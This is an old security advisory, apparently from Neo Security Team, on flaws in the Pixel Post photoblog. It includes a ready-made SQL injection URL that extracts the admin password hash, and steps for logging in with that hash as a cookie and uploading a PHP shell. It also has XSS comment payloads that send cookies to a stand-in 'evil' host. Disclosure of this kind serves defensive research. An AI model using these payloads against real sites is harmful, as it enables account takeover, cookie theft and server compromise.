/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]� - Advisory #19 - 04/03/06
--------------------------------------------------------
Program: Pixel Post
Homepage: http://www.pixelpost.org/
Vulnerable Versions: 1.4.3, 1.5 beta1 and possibly lower versions.
Risk: High!
Impact: XSS, and SQL Injection providing full access to admin area, providing upload any type of files capabilities.. :D

-==Pixel Post Multiple Vulnerabilities ==-
---------------------------------------------------------

- Description
---------------------------------------------------------
Pixelpost is a photoblog application powered by PHP and MySQL. It's developed and maintained by photobloggers who like to keep the meaning behind photoblogging in mind, the photography, and not about the 311 hacks you would have to get through to get your regular blog to work like...

- Tested
---------------------------------------------------------
localhost + many sites

- Explotation
---------------------------------------------------------

1)

Vulnerable code:

magic_quotes_gpc must be Off in order to exploit it.

==[ index.php 135-147 ]==========================
[...]
if($_GET['showimage'] == "") {
  $row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where datetime<='$cdate' order by datetime DESC limit 0,1");
  } else {
     $row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where (id='".$_GET['showimage']."')");
  }
if(!$row['image']) {
      echo "Coming Soon! Nothing to show. No image to show here!";
    exit;
    }
$image_name         = $row['image'];
$image_title        = pullout($row['headline']);
$image_id           = $row['id'];
$image_datetime     = $row['datetime'];  
[...]
==[ end index.php ]==========================


$showimage is the variable that is not properly sanitized (or not at all) and it's on line 138 that we can get advantage from this.

Since the application prevents PHP or MySQL Errors from being shown, we have to fetch the data replacing the one that was supposed to be fetched. So that $row[] is going to fetch what we specify and then print it on the page.

With this vulnerability we can fetch almost any data from the database, and from any tables.

PoC:
---------------------------------------------------------

http://[site]/[pixelpost_path]/?showimage=')%20UNION%20SELECT%20template%20as%20id,%20email%20as%20headline,%20admin%20as%20datetime,%20password%20as%20body,%20sitetitle%20as%20category,%20langfile%20as%20image%20FROM%20pixelpost_config/*

With this you can see on the frontpage, the username of the admin, and below resides the md5 hash of the admin.

It's not necesarry to crack it since you can log in to the admin through a cookie with the md5 hash.

pixelpost_admin=[hash]

Once having access to the admin area, you can upload any type of files, since file types or extensions are not checked.

So you can upload a PHP Shell or whatever. And depending on Server Configuration gain system access.


2)

Also by default you can see the System Configuration by viewing: 

http://[site]/[pixelpost_path]/includes/phpinfo.php

==[ includes/phpinfo.php ]==========================
<?
phpinfo();
?>
==[ end includes/phpinfo.php ]======================

Which isn't restricted at all.


3)

Another SQL Injection resides when modifying the USER_AGENT, HTTP_REFERER and HTTP_HOST

The script doesn't sanitize this variables at all in includes/functions.php

==[ includes/functions.php 159-183 ]==========================
[...]
function book_visitor($str)
{
  // book a visitor
  $datetime = gmdate("Y-m-d H:i:s",gmdate("U")+(3600 * $cfgrow['timezone']));
  $host = $_SERVER['HTTP_HOST'];
  $referer = $_SERVER['HTTP_REFERER'];

  // don't book a referer from self
  $refererhost = parse_url($referer);
  $refererhost = $refererhost['host'];
  if($refererhost == $host)
  {
     $referer = "";
  }
  $ua = $_SERVER['HTTP_USER_AGENT'];
  $ip = $_SERVER['REMOTE_ADDR'];
  $ruri = $_SERVER['REQUEST_URI'];
  // ### if cookie lastvisit not set, count the people!
  if(!isset($_COOKIE['lastvisit']))
  {
    $query = "insert into $str(id,datetime,host,referer,ua,ip,ruri)
    VALUES('NULL','$datetime','$host','$referer','$ua','$ip','$ruri')";
      $result = mysql_query($query);
  }
}
[...]
==[ end includes/functions.php ]==============================


4)

You can perform a XSS attack when commenting a post because the comment, the name, the url, and nor the email are properly sanitized.

Comment: 
<img src="javascript:alert('xss')"> (IE and Opera)
<img src="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie"> (Steal cookies)

<a href="javascript:alert('xss')">sarasa</a> (IE, Opera, Mozilla and probably all major browsers, but the user must click the link in order to succed)
<a href="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie">sarasa</a> (Steal cookies)

There are lots of things you can do with a bit of imagination.



The application was not fully tested and many other vulnerabilities are probably present (Almost sure!)


- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=19

- Credits
-------------------------------------------------
Discovered by Knightmare -> mr.knightmarex [at] gmail [at] com

[ 3KLabs ] :: [ http://www.3klabs.com/ ]

And Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST]� - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
Mike
Guille
Zeus54
HaCkZaTaN
K4P0
Daemon21
Link
LINUX

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */